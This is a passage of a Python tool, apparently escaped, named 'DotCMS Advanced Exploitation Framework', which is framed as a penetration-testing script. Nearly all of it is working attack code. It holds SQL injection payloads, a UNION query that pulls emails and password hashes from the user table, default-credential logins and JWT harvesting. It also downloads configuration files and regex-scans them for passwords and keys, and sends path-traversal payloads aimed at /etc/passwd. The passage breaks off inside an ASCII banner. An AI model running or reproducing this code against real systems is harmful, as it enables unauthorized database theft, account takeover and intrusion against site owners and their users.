‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Accept-Encoding’: ‘gzip, deflate’,\\n ‘Connection’: ‘keep-alive’\\n })\\n \\n # Suppress warnings\\n import urllib3\\n urllib3.disable_warnings()\\n \\n print(f\\”{Fore.CYAN}{‘=’*80}\\”)\\n print(f\\”{Fore.YELLOW} DotCMS Advanced Exploitation Framework\\”)\\n print(f\\”{Fore.YELLOW} Enhanced with Database Enumeration\\”)\\n print(f\\”{Fore.CYAN}{‘=’*80}{Style.RESET_ALL}\\”)\\n \\n def log(self, message, level=’info’):\\n \\”\\”\\”Log with colors\\”\\”\\”\\n timestamp = datetime.now().strftime(‘%H:%M:%S’)\\n colors = {\\n ‘success’: Fore.GREEN + Style.BRIGHT,\\n ‘error’: Fore.RED + Style.BRIGHT,\\n ‘warning’: Fore.YELLOW + Style.BRIGHT,\\n ‘info’: Fore.CYAN,\\n ‘critical’: Fore.RED + Back.WHITE + Style.BRIGHT,\\n ‘debug’: Fore.LIGHTBLACK_EX,\\n ‘section’: Fore.MAGENTA + Style.BRIGHT,\\n }\\n \\n color = colors.get(level, Fore.RESET)\\n print(f\\”{color}[{timestamp}] {message}{Style.RESET_ALL}\\”)\\n \\n # Log to file\\n with open(f\\”{self.results_dir}\/execution.log\\”, ‘a’, encoding=’utf-8′) as f:\\n f.write(f\\”[{timestamp}] {message}\\\\n\\”)\\n \\n def check_tls(self):\\n \\”\\”\\”Check TLS\/SSL configuration\\”\\”\\”\\n self.log(\\”[*] Checking TLS\/SSL configuration…\\”, ‘info’)\\n \\n try:\\n parsed = urlparse(self.target)\\n hostname = parsed.hostname\\n port = parsed.port or 443\\n \\n context = ssl.create_default_context()\\n with socket.create_connection((hostname, port), timeout=10) as sock:\\n with context.wrap_socket(sock, server_hostname=hostname) as ssock:\\n cert = ssock.getpeercert()\\n \\n # Check certificate expiry\\n if ‘notAfter’ in cert:\\n expires = datetime.strptime(cert[‘notAfter’], ‘%b %d %H:%M:%S %Y %Z’)\\n days_to_expire = (expires – datetime.now()).days\\n \\n if days_to_expire \\u003c 30:\\n self.log(f\\”[-] Certificate expires in {days_to_expire} days\\”, ‘warning’)\\n else:\\n self.log(f\\”[+] Certificate valid for {days_to_expire} days\\”, ‘success’)\\n \\n # Get SSL\/TLS version\\n ssl_version = ssock.version()\\n self.log(f\\”[+] SSL\/TLS Version: {ssl_version}\\”, ‘success’)\\n \\n except Exception as e:\\n self.log(f\\”[-] TLS check failed: {str(e)}\\”, ‘error’)\\n \\n def cors_analysis(self):\\n \\”\\”\\”Analyze CORS configuration\\”\\”\\”\\n self.log(\\”[*] Analyzing CORS configuration…\\”, ‘info’)\\n \\n test_origins = [\\n ‘https:\/\/evil.com’,\\n ‘http:\/\/evil.com’,\\n ‘null’,\\n self.target.replace(‘https:\/\/’, ‘http:\/\/’),\\n ]\\n \\n vulnerable = False\\n \\n for origin in test_origins:\\n headers = {‘Origin’: origin}\\n \\n try:\\n response = self.session.get(self.target, headers=headers, timeout=10)\\n \\n if ‘Access-Control-Allow-Origin’ in response.headers:\\n allowed_origin = response.headers[‘Access-Control-Allow-Origin’]\\n \\n if allowed_origin == origin or allowed_origin == ‘*’:\\n self.log(f\\”[!] CORS Misconfiguration: {allowed_origin}\\”, ‘warning’)\\n vulnerable = True\\n \\n if ‘Access-Control-Allow-Credentials’ in response.headers:\\n if response.headers[‘Access-Control-Allow-Credentials’].lower() == ‘true’:\\n self.log(f\\”[!] CORS with credentials allowed!\\”, ‘critical’)\\n \\n except Exception as e:\\n pass\\n \\n if not vulnerable:\\n self.log(\\”[+] CORS properly configured\\”, ‘success’)\\n \\n async def async_discovery(self):\\n \\”\\”\\”Asynchronous discovery of endpoints\\”\\”\\”\\n self.log(\\”[*] Starting asynchronous discovery…\\”, ‘info’)\\n \\n # Common DotCMS endpoints\\n endpoints = [\\n ‘\/api\/v1\/contenttype’,\\n ‘\/api\/v1\/workflow’,\\n ‘\/api\/v1\/sites’,\\n ‘\/api\/v1\/users’,\\n ‘\/api\/v1\/authentication’,\\n ‘\/dotAdmin\/’,\\n ‘\/admin\/’,\\n ‘\/html\/portlet\/’,\\n ‘\/c\/’,\\n ‘\/application\/’,\\n ‘\/.env’,\\n ‘\/config.json’,\\n ‘\/web.config’,\\n ‘\/dotcms-config.xml’\\n ]\\n \\n async def check_endpoint(session, endpoint):\\n url = urljoin(self.target, endpoint)\\n try:\\n async with session.get(url, timeout=10, ssl=False) as response:\\n return {\\n ‘endpoint’: endpoint,\\n ‘status’: response.status,\\n ‘url’: str(response.url)\\n }\\n except Exception as e:\\n return {\\n ‘endpoint’: endpoint,\\n ‘status’: 0,\\n ‘error’: str(e)\\n }\\n \\n connector = aiohttp.TCPConnector(ssl=False)\\n timeout = aiohttp.ClientTimeout(total=30)\\n \\n async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:\\n tasks = [check_endpoint(session, endpoint) for endpoint in endpoints]\\n results = await asyncio.gather(*tasks)\\n \\n discovered = []\\n for result in results:\\n if isinstance(result, dict) and result.get(‘status’, 0) in [200, 301, 302, 403]:\\n discovered.append(result)\\n \\n self.log(f\\”[+] Discovered {len(discovered)} accessible endpoints\\”, ‘success’)\\n return discovered\\n \\n def enhanced_sqli_testing(self):\\n \\”\\”\\”Enhanced SQL injection testing\\”\\”\\”\\n self.log(\\”\\\\n[*] Starting enhanced SQL injection testing…\\”, ‘info’)\\n \\n endpoints = [\\n ‘\/api\/v1\/contenttype’,\\n ‘\/api\/v1\/workflow’,\\n ‘\/api\/v1\/sites’,\\n ‘\/dotAdmin\/personalization’\\n ]\\n \\n # Advanced payloads\\n payloads = {\\n ‘Time-Based’: [\\n \\”‘ AND (SELECT pg_sleep(5))–\\”,\\n \\”‘ AND SLEEP(5)–\\”,\\n \\”‘ WAITFOR DELAY ’00:00:05’–\\”,\\n \\”‘ AND 1234=(SELECT 1234 FROM PG_SLEEP(5))–\\”\\n ],\\n ‘Error-Based’: [\\n \\”‘ AND (SELECT cast((SELECT ‘test’) as int))–\\”,\\n \\”‘ AND extractvalue(1, concat(0x7e, version()))–\\”,\\n \\”‘ AND 1=CONVERT(int, @@version)–\\”\\n ],\\n ‘Boolean-Based’: [\\n \\”‘ AND ‘1’=’1\\”,\\n \\”‘ AND ‘1’=’2\\”,\\n \\”‘ OR ‘1’=’1\\”\\n ],\\n ‘Union-Based’: [\\n \\”‘ UNION SELECT NULL,NULL,NULL–\\”,\\n \\”‘ UNION SELECT 1,2,3–\\”,\\n \\”‘ UNION SELECT @@version,user(),database()–\\”\\n ]\\n }\\n \\n vulnerabilities = []\\n \\n for endpoint in endpoints:\\n self.log(f\\”[*] Testing endpoint: {endpoint}\\”, ‘info’)\\n url = urljoin(self.target, endpoint)\\n \\n # First get baseline\\n try:\\n baseline = self.session.get(url, timeout=10)\\n baseline_length = len(baseline.text)\\n except:\\n baseline_length = 0\\n \\n for category, category_payloads in payloads.items():\\n for payload in category_payloads[:3]: # Test first 3 of each category\\n try:\\n start_time = time.time()\\n response = self.session.get(\\n url, \\n params={‘filter’: payload},\\n timeout=15\\n )\\n elapsed = time.time() – start_time\\n \\n # Time-Based detection\\n if category == ‘Time-Based’ and elapsed \\u003e 4:\\n self.log(f\\”[!] Time-Based SQLi detected on {endpoint}\\”, ‘critical’)\\n vulnerabilities.append({\\n ‘endpoint’: endpoint,\\n ‘type’: category,\\n ‘payload’: payload,\\n ‘delay’: round(elapsed, 2),\\n ‘status’: response.status_code\\n })\\n \\n evidence_id = self.evidence.add_evidence(\\n f’SQL_Injection_{category}’,\\n endpoint,\\n payload,\\n f\\”GET {url}?filter={quote(payload)}\\”,\\n response.text[:1000],\\n severity=\\”Critical\\”,\\n cvss=9.0,\\n cwe=89\\n )\\n self.stats[‘vulnerabilities’] += 1\\n break\\n \\n # Error-Based detection\\n error_indicators = [\\n ‘SQL syntax’, ‘mysql_fetch’, ‘pg_’, ‘ORA-‘,\\n ‘Microsoft OLE DB’, ‘Unclosed quotation’,\\n ‘You have an error in your SQL syntax’\\n ]\\n \\n if any(indicator.lower() in response.text.lower() for indicator in error_indicators):\\n self.log(f\\”[!] Error-Based SQLi detected on {endpoint}\\”, ‘critical’)\\n vulnerabilities.append({\\n ‘endpoint’: endpoint,\\n ‘type’: category,\\n ‘payload’: payload,\\n ‘status’: response.status_code\\n })\\n \\n evidence_id = self.evidence.add_evidence(\\n f’SQL_Injection_{category}’,\\n endpoint,\\n payload,\\n f\\”GET {url}?filter={quote(payload)}\\”,\\n response.text[:1000],\\n severity=\\”Critical\\”,\\n cvss=9.0,\\n cwe=89\\n )\\n self.stats[‘vulnerabilities’] += 1\\n break\\n \\n # Boolean-Based detection\\n if category == ‘Boolean-Based’:\\n test_length = len(response.text)\\n if abs(baseline_length – test_length) \\u003e 200:\\n self.log(f\\”[!] Boolean-Based SQLi suspected on {endpoint}\\”, ‘warning’)\\n vulnerabilities.append({\\n ‘endpoint’: endpoint,\\n ‘type’: category,\\n ‘payload’: payload,\\n ‘length_diff’: abs(baseline_length – test_length)\\n })\\n \\n except Exception as e:\\n continue\\n \\n return vulnerabilities\\n \\n def extract_users_comprehensive(self, vulnerable_endpoint=None):\\n \\”\\”\\”Comprehensive user extraction\\”\\”\\”\\n self.log(\\”\\\\n[*] Starting comprehensive user extraction…\\”, ‘info’)\\n \\n # If no endpoint provided, try common ones\\n if not vulnerable_endpoint:\\n endpoints_to_try = [‘\/api\/v1\/contenttype’, ‘\/api\/v1\/sites’]\\n else:\\n endpoints_to_try = [vulnerable_endpoint]\\n \\n users = []\\n \\n for endpoint in endpoints_to_try:\\n try:\\n # Try to get version first\\n version_payload = \\”‘ AND (SELECT substring(version() from 1 for 1))=’P’–\\”\\n response = self.session.get(\\n urljoin(self.target, endpoint),\\n params={‘filter’: version_payload},\\n timeout=10\\n )\\n \\n # Simple extraction attempt\\n extract_payload = \\”‘ UNION SELECT NULL,emailaddress,password_ FROM user_ LIMIT 5–\\”\\n response = self.session.get(\\n urljoin(self.target, endpoint),\\n params={‘filter’: extract_payload},\\n timeout=10\\n )\\n \\n # Look for email patterns in response\\n email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,}’\\n hash_pattern = r’\\\\$2[ay]\\\\$\\\\d+\\\\$[a-zA-Z0-9.\/]+’\\n \\n emails = re.findall(email_pattern, response.text)\\n hashes = re.findall(hash_pattern, response.text)\\n \\n for email in emails[:5]: # Limit to 5 emails\\n users.append({\\n ’email’: email,\\n ‘source’: endpoint,\\n ‘method’: ‘direct_extraction’\\n })\\n self.log(f\\”[+] Found email: {email}\\”, ‘success’)\\n \\n if emails or hashes:\\n self.evidence.add_evidence(\\n ‘User_Data_Exposure’,\\n endpoint,\\n extract_payload,\\n f\\”GET {urljoin(self.target, endpoint)}?filter={quote(extract_payload)}\\”,\\n response.text[:2000],\\n severity=\\”High\\”,\\n cvss=7.5,\\n cwe=200\\n )\\n \\n except Exception as e:\\n self.log(f\\”[-] Extraction failed for {endpoint}: {str(e)}\\”, ‘error’)\\n \\n if users:\\n self.log(f\\”[+] Extracted {len(users)} potential users\\”, ‘success’)\\n self.save_extracted_data(‘users’, users)\\n self.stats[‘users_extracted’] = len(users)\\n \\n return users\\n \\n def enhanced_jwt_hunting(self):\\n \\”\\”\\”Enhanced JWT token hunting\\”\\”\\”\\n self.log(\\”\\\\n[*] Enhanced JWT token hunting…\\”, ‘info’)\\n \\n found_tokens = []\\n \\n # Check login endpoint\\n login_url = urljoin(self.target, ‘\/api\/v1\/authentication\/logInUser’)\\n \\n # Try default credentials\\n default_creds = [\\n {‘userId’: ‘admin@dotcms.com’, ‘password’: ‘admin’},\\n {‘userId’: ‘admin’, ‘password’: ‘admin123’},\\n {‘userId’: ‘demo’, ‘password’: ‘demo’}\\n ]\\n \\n for creds in default_creds:\\n try:\\n response = self.session.post(\\n login_url,\\n json=creds,\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n # Look for JWT in response\\n jwt_pattern = r'[A-Za-z0-9\\\\-_]+\\\\.[A-Za-z0-9\\\\-_]+\\\\.[A-Za-z0-9\\\\-_]+’\\n tokens = re.findall(jwt_pattern, response.text)\\n \\n for token in tokens:\\n if len(token) \\u003e 50: # Basic JWT validation\\n found_tokens.append(token)\\n self.log(f\\”[+] Found JWT token: {token[:30]}…\\”, ‘success’)\\n \\n # Test token\\n if self.validate_jwt(token):\\n self.log(f\\”[\u2713] JWT token is valid!\\”, ‘success’)\\n \\n except Exception as e:\\n continue\\n \\n # Also check current user endpoint\\n current_user_url = urljoin(self.target, ‘\/api\/v1\/users\/current’)\\n try:\\n response = self.session.get(current_user_url, timeout=10)\\n jwt_pattern = r'[A-Za-z0-9\\\\-_]+\\\\.[A-Za-z0-9\\\\-_]+\\\\.[A-Za-z0-9\\\\-_]+’\\n tokens = re.findall(jwt_pattern, response.text)\\n found_tokens.extend(tokens)\\n except:\\n pass\\n \\n if found_tokens:\\n found_tokens = list(set(found_tokens)) # Remove duplicates\\n self.save_extracted_data(‘jwt_tokens’, found_tokens)\\n self.stats[‘tokens_found’] = len(found_tokens)\\n \\n return found_tokens\\n \\n def validate_jwt(self, token):\\n \\”\\”\\”Validate JWT token\\”\\”\\”\\n # Basic format check\\n parts = token.split(‘.’)\\n if len(parts) != 3:\\n return False\\n \\n # Try to use token\\n headers = {‘Authorization’: f’Bearer {token}’}\\n test_urls = [\\n ‘\/api\/v1\/users\/current’,\\n ‘\/api\/v1\/sites’,\\n ‘\/dotAdmin\/’\\n ]\\n \\n for endpoint in test_urls:\\n url = urljoin(self.target, endpoint)\\n try:\\n response = self.session.get(url, headers=headers, timeout=10)\\n if response.status_code == 200:\\n return True\\n except:\\n continue\\n \\n return False\\n \\n def save_extracted_data(self, data_type, data):\\n \\”\\”\\”Save extracted data to file\\”\\”\\”\\n filename = f\\”{self.results_dir}\/{data_type}.json\\”\\n \\n with open(filename, ‘w’, encoding=’utf-8′) as f:\\n json.dump(data, f, indent=2, default=str)\\n \\n self.log(f\\”[+] Data saved to {filename}\\”, ‘success’)\\n \\n def dump_configuration(self):\\n \\”\\”\\”Dump configuration files\\”\\”\\”\\n self.log(\\”\\\\n[*] Dumping configuration files…\\”, ‘info’)\\n \\n config_files = [\\n ‘\/.env’,\\n ‘\/config.json’,\\n ‘\/configuration.json’,\\n ‘\/web.config’,\\n ‘\/server-config.xml’,\\n ‘\/dotcms-config.xml’,\\n ‘\/WEB-INF\/web.xml’,\\n ‘\/META-INF\/context.xml’\\n ]\\n \\n leaked_files = []\\n \\n for config_file in config_files:\\n url = urljoin(self.target, config_file)\\n try:\\n response = self.session.get(url, timeout=10)\\n if response.status_code == 200 and len(response.text) \\u003e 10:\\n self.log(f\\”[+] Found config file: {config_file}\\”, ‘success’)\\n \\n # Save file\\n safe_name = config_file.replace(‘\/’, ‘_’).replace(‘.’, ‘_’)\\n file_path = f\\”{self.results_dir}\/config_{safe_name}.txt\\”\\n with open(file_path, ‘w’, encoding=’utf-8′) as f:\\n f.write(response.text)\\n \\n leaked_files.append({\\n ‘file’: config_file,\\n ‘url’: url,\\n ‘size’: len(response.text),\\n ‘saved_as’: file_path\\n })\\n \\n self.stats[‘files_leaked’] += 1\\n \\n # Check for sensitive info\\n sensitive_patterns = [\\n r’password\\\\s*[:=]\\\\s*[\\\\’\\”]?([^\\\\’\\”\\\\s]+)’,\\n r’secret\\\\s*[:=]\\\\s*[\\\\’\\”]?([^\\\\’\\”\\\\s]+)’,\\n r’api[_-]?key\\\\s*[:=]\\\\s*[\\\\’\\”]?([^\\\\’\\”\\\\s]+)’,\\n r’database.*password’,\\n r’jwt.*secret’\\n ]\\n \\n for pattern in sensitive_patterns:\\n matches = re.findall(pattern, response.text, re.IGNORECASE)\\n if matches:\\n self.log(f\\”[!] Sensitive data found in {config_file}: {matches[:3]}\\”, ‘critical’)\\n \\n except Exception as e:\\n continue\\n \\n return leaked_files\\n \\n def check_file_inclusion(self):\\n \\”\\”\\”Check for file inclusion vulnerabilities\\”\\”\\”\\n self.log(\\”\\\\n[*] Checking for file inclusion vulnerabilities…\\”, ‘info’)\\n \\n lfi_payloads = [\\n ‘..\/..\/..\/..\/etc\/passwd’,\\n ‘..\/..\/..\/..\/windows\/win.ini’,\\n ‘..\/..\/..\/..\/WEB-INF\/web.xml’,\\n ‘..\/..\/..\/..\/proc\/self\/environ’,\\n ‘file:\/\/\/etc\/passwd’,\\n ‘….\/\/….\/\/….\/\/etc\/passwd’\\n ]\\n \\n vulnerable_endpoints = [\\n ‘\/api\/v1\/download’,\\n ‘\/dotAdmin\/download’,\\n ‘\/html\/portlet\/ext\/contentlet\/field_validation.jsp’,\\n ‘\/c\/download’\\n ]\\n \\n found_lfi = []\\n \\n for endpoint in vulnerable_endpoints:\\n for payload in lfi_payloads:\\n url = urljoin(self.target, endpoint)\\n params = {‘file’: payload, ‘filename’: payload}\\n \\n try:\\n response = self.session.get(url, params=params, timeout=10)\\n \\n # Check for LFI indicators\\n indicators = [‘root:’, ‘[fonts]’, ‘\\u003cweb-app’, ‘PATH=’, ‘JAVA_OPTS’]\\n if any(indicator in response.text for indicator in indicators):\\n self.log(f\\”[!] LFI vulnerability found: {endpoint}?file={payload}\\”, ‘critical’)\\n found_lfi.append({\\n ‘endpoint’: endpoint,\\n ‘payload’: payload,\\n ‘response_sample’: response.text[:200]\\n })\\n \\n self.evidence.add_evidence(\\n ‘Local_File_Inclusion’,\\n endpoint,\\n payload,\\n f\\”GET {url}?file={quote(payload)}\\”,\\n response.text[:1000],\\n severity=\\”High\\”,\\n cvss=7.5,\\n cwe=22\\n )\\n break\\n \\n except Exception as e:\\n continue\\n \\n return found_lfi\\n \\n def run_database_exploitation(self, vulnerable_endpoint=None):\\n \\”\\”\\”Run database-specific exploitation\\”\\”\\”\\n self.log(\\”\\\\n\\” + \\”=\\”*80, ‘info’)\\n self.log(\\”DATABASE EXPLOITATION MODULE\\”, ‘section’)\\n self.log(\\”=\\”*80, ‘info’)\\n \\n # If no endpoint provided, find one\\n if not vulnerable_endpoint:\\n sqli_vulns = self.enhanced_sqli_testing()\\n if sqli_vulns:\\n vulnerable_endpoint = sqli_vulns[0].get(‘endpoint’)\\n self.log(f\\”[+] Using vulnerable endpoint: {vulnerable_endpoint}\\”, ‘success’)\\n else:\\n self.log(\\”[-] No SQL injection vulnerabilities found\\”, ‘error’)\\n return None\\n \\n # Run comprehensive database dump\\n db_results = self.db_enumerator.comprehensive_database_dump(vulnerable_endpoint)\\n \\n # Update statistics\\n if db_results:\\n self.stats[‘tables_enumerated’] = len(db_results.get(‘tables’, []))\\n self.stats[‘records_dumped’] = sum(\\n len(data) for data in db_results.get(‘dumped_data’, {}).values()\\n )\\n \\n return db_results\\n \\n def run_full_exploitation(self):\\n \\”\\”\\”Run complete exploitation chain including database\\”\\”\\”\\n self.log(f\\”\\\\n{Fore.CYAN}{‘=’*80}\\”, ‘info’)\\n self.log(f\\”{Fore.YELLOW}STARTING COMPLETE EXPLOITATION CHAIN\\”, ‘info’)\\n self.log(f\\”{Fore.CYAN}{‘=’*80}{Style.RESET_ALL}\\”, ‘info’)\\n \\n # Phase 1: Reconnaissance\\n self.log(\\”\\\\n[PHASE 1] RECONNAISSANCE\\”, ‘section’)\\n self.check_tls()\\n self.cors_analysis()\\n \\n # Async discovery\\n try:\\n loop = asyncio.new_event_loop()\\n asyncio.set_event_loop(loop)\\n discovered = loop.run_until_complete(self.async_discovery())\\n loop.close()\\n except:\\n self.log(\\”[-] Async discovery failed, continuing…\\”, ‘warning’)\\n \\n # Phase 2: Vulnerability Assessment\\n self.log(\\”\\\\n[PHASE 2] VULNERABILITY ASSESSMENT\\”, ‘section’)\\n sqli_vulns = self.enhanced_sqli_testing()\\n \\n # Phase 3: Database Exploitation\\n self.log(\\”\\\\n[PHASE 3] DATABASE EXPLOITATION\\”, ‘section’)\\n db_results = None\\n if sqli_vulns:\\n db_results = self.run_database_exploitation(sqli_vulns[0].get(‘endpoint’))\\n else:\\n self.log(\\”[-] Skipping database exploitation – no SQLi found\\”, ‘warning’)\\n \\n # Phase 4: Application Exploitation\\n self.log(\\”\\\\n[PHASE 4] APPLICATION EXPLOITATION\\”, ‘section’)\\n \\n if sqli_vulns:\\n # Extract users\\n users = self.extract_users_comprehensive(sqli_vulns[0].get(‘endpoint’))\\n else:\\n # Try anyway\\n users = self.extract_users_comprehensive()\\n \\n # Hunt for JWT tokens\\n tokens = self.enhanced_jwt_hunting()\\n \\n # Phase 5: Post-Exploitation\\n self.log(\\”\\\\n[PHASE 5] POST-EXPLOITATION\\”, ‘section’)\\n leaked_configs = self.dump_configuration()\\n lfi_vulns = self.check_file_inclusion()\\n \\n # Phase 6: Reporting\\n self.log(\\”\\\\n[PHASE 6] REPORTING\\”, ‘section’)\\n self.generate_comprehensive_report(sqli_vulns, users, tokens, leaked_configs, lfi_vulns, db_results)\\n \\n # Show statistics\\n self.show_statistics()\\n \\n def generate_comprehensive_report(self, sqli_vulns, users, tokens, configs, lfi_vulns, db_results=None):\\n \\”\\”\\”Generate professional report with database findings\\”\\”\\”\\n report = f\\”\\”\\”\\n {‘=’*80}\\n PENETRATION TEST REPORT – DotCMS Assessment\\n {‘=’*80}\\n \\n Target: {self.target}\\n Date: {datetime.now()}\\n Tool: DotCMS Advanced Exploitation Framework\\n \\n EXECUTIVE SUMMARY\\n {‘-‘*80}\\n Critical Vulnerabilities: {len(sqli_vulns)}\\n Database Tables Enumerated: {self.stats[‘tables_enumerated’]}\\n Database Records Dumped: {self.stats[‘records_dumped’]}\\n Sensitive Data Exposed: {len(users) + len(tokens)}\\n Configuration Files Leaked: {len(configs)}\\n LFI Vulnerabilities: {len(lfi_vulns)}\\n Overall Risk: {\\”CRITICAL\\” if len(sqli_vulns) \\u003e 0 else \\”HIGH\\”}\\n \\”\\”\\”\\n \\n # Database specific findings\\n if db_results:\\n report += f\\”\\”\\”\\n DATABASE FINDINGS\\n {‘-‘*80}\\n Database Type: {db_results.get(‘database_info’, {}).get(‘type’, ‘Unknown’)}\\n Tables Discovered: {len(db_results.get(‘tables’, []))}\\n Tables Dumped: {len(db_results.get(‘dumped_data’, {}))}\\n Sensitive Columns: {len(db_results.get(‘sensitive_columns’, {}))}\\n Cleartext Passwords\/Data: {len(db_results.get(‘cleartext_data’, {}))}\\n \\”\\”\\”\\n \\n report += f\\”\\”\\”\\n DETAILED FINDINGS\\n {‘-‘*80}\\n 1. SQL INJECTION VULNERABILITIES: {len(sqli_vulns)}\\n \\”\\”\\”\\n \\n for i, vuln in enumerate(sqli_vulns, 1):\\n report += f\\” {i}. Endpoint: {vuln.get(‘endpoint’, ‘N\/A’)}\\\\n\\”\\n report += f\\” Type: {vuln.get(‘type’, ‘N\/A’)}\\\\n\\”\\n if ‘delay’ in vuln:\\n report += f\\” Delay: {vuln[‘delay’]} seconds\\\\n\\”\\n report += f\\” Payload: {vuln.get(‘payload’, ‘N\/A’)[:50]}…\\\\n\\”\\n \\n # Database findings\\n if db_results and db_results.get(‘tables’):\\n report += f\\”\\”\\”\\n 2. DATABASE ENUMERATION RESULTS\\n \\”\\”\\”\\n for i, table in enumerate(db_results.get(‘tables’, [])[:10], 1):\\n report += f\\” {i}. Table: {table}\\\\n\\”\\n \\n if db_results.get(‘dumped_data’):\\n report += f\\”\\\\n Data dumped from {len(db_results[‘dumped_data’])} tables\\\\n\\”\\n \\n if db_results.get(‘cleartext_data’):\\n report += f\\” Cleartext data found in {len(db_results[‘cleartext_data’])} columns\\\\n\\”\\n \\n report += f\\”\\”\\”\\n 3. USER DATA EXPOSED: {len(users)}\\n \\”\\”\\”\\n for i, user in enumerate(users[:5], 1):\\n report += f\\” {i}. Email: {user.get(’email’, ‘N\/A’)}\\\\n\\”\\n \\n report += f\\”\\”\\”\\n 4. JWT TOKENS FOUND: {len(tokens)}\\n \\”\\”\\”\\n for i, token in enumerate(tokens[:3], 1):\\n report += f\\” {i}. Token: {token[:30]}…\\\\n\\”\\n \\n report += f\\”\\”\\”\\n 5. CONFIGURATION FILES: {len(configs)}\\n \\”\\”\\”\\n for i, config in enumerate(configs[:3], 1):\\n report += f\\” {i}. File: {config.get(‘file’, ‘N\/A’)}\\\\n\\”\\n \\n report += f\\”\\”\\”\\n 6. LFI VULNERABILITIES: {len(lfi_vulns)}\\n \\”\\”\\”\\n for i, lfi in enumerate(lfi_vulns, 1):\\n report += f\\” {i}. Endpoint: {lfi.get(‘endpoint’, ‘N\/A’)}\\\\n\\”\\n report += f\\” Payload: {lfi.get(‘payload’, ‘N\/A’)}\\\\n\\”\\n \\n report += f\\”\\”\\”\\n RECOMMENDATIONS\\n {‘-‘*80}\\n 1. IMMEDIATE: Patch all SQL injection vulnerabilities\\n 2. Encrypt all database fields containing sensitive data\\n 3. Implement proper input validation and parameterized queries\\n 4. Rotate all exposed credentials and JWT tokens\\n 5. Implement database activity monitoring\\n 6. Restrict access to configuration files\\n 7. Conduct comprehensive security audit\\n 8. Implement Web Application Firewall (WAF)\\n \\n EVIDENCE LOCATION\\n {‘-‘*80}\\n Evidence Database: {self.evidence.evidence_db}\\n Results Directory: {self.results_dir}\\n Database Dumps: {self.results_dir}\/dump_*.json\\n Full Database Report: {self.results_dir}\/database_penetration_report.txt\\n Log File: {self.results_dir}\/execution.log\\n \\n {‘=’*80}\\n END OF REPORT\\n {‘=’*80}\\n \\”\\”\\”\\n \\n report_file = f\\”{self.results_dir}\/penetration_test_report.txt\\”\\n with open(report_file, ‘w’, encoding=’utf-8′) as f:\\n f.write(report)\\n \\n self.log(f\\”[+] Report generated: {report_file}\\”, ‘success’)\\n print(f\\”\\\\n{Fore.GREEN}{report[:2000]}…{Style.RESET_ALL}\\”)\\n \\n def show_statistics(self):\\n \\”\\”\\”Show execution statistics\\”\\”\\”\\n stats_text = f\\”\\”\\”\\n {‘=’*80}\\n EXPLOITATION STATISTICS\\n {‘=’*80}\\n \\n Vulnerabilities Found: {self.stats[‘vulnerabilities’]}\\n Database Tables Enumerated: {self.stats[‘tables_enumerated’]}\\n Database Records Dumped: {self.stats[‘records_dumped’]}\\n Users Extracted: {self.stats[‘users_extracted’]}\\n JWT Tokens Found: {self.stats[‘tokens_found’]}\\n Files Leaked: {self.stats[‘files_leaked’]}\\n \\n DIRECTORIES CREATED\\n {‘-‘*80}\\n Evidence Directory: {self.evidence.evidence_dir}\\n Results Directory: {self.results_dir}\\n Database Dumps: {self.results_dir}\/dump_*.{json,csv}\\n \\n NEXT STEPS\\n {‘-‘*80}\\n 1. Review database dumps in: {self.results_dir}\/dump_*.json\\n 2. Check cleartext data in: {self.results_dir}\/cleartext_search.json\\n 3. See database report: {self.results_dir}\/database_penetration_report.txt\\n 4. Present critical findings to security team immediately\\n \\n {‘=’*80}\\n \\”\\”\\”\\n \\n print(f\\”{Fore.CYAN}{stats_text}{Style.RESET_ALL}\\”)\\n \\n def main():\\n \\”\\”\\”Main function\\”\\”\\”\\n banner = r\\”\\”\\”\\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d 